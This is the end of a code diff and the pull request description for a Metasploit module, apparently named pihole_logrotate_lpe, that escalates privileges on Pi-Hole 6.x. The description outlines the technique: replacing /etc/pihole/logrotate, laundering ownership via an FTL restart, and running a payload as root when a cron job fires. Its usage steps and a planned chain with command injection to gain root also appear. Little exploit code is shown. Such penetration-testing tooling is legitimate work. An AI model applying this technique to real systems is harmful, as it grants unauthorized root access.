     end
-    client.fs.file.rm_f(@payload_script)
-    print_status("Restored #{LOGROTATE_CONF}")
   end
 end


### PR DESCRIPTION
## Description

This PR adds a Pi-Hole linux priv escalation. I plan to add a command injection exploit later that, when combined with this, will give root on the system. Previous pi-hole exploits only target the 5.x branch, so this will be the start of our addition to the 6.x branch.

## Breaking Changes

None

## Reviewer Notes

None, just use the docker.

## Verification Steps

1. - [ ] Install the application
1. - [ ] Start msfconsole
1. - [ ] Get a session as the `pihole` user
1. - [ ] Do: `use exploit/linux/local/pihole_logrotate_lpe`
1. - [ ] Do: `set session [#]`
IF USING DOCKER YOU"LL NEED TO CHANGE THE `FETCH_SRVPORT`
1. - [ ] Do: `run`
1. - [ ] The module replaces `/etc/pihole/logrotate`, tries to launder the
   ownership through an FTL restart, and the payload executes as root when
   the daily `pihole flush once` cron fires (00:00 local) or at the next
   reboot.

## AI Usage Disclosure

GLM-5.3 assisted, but man does it make some not great stuff. Lots of cleanup afterwards.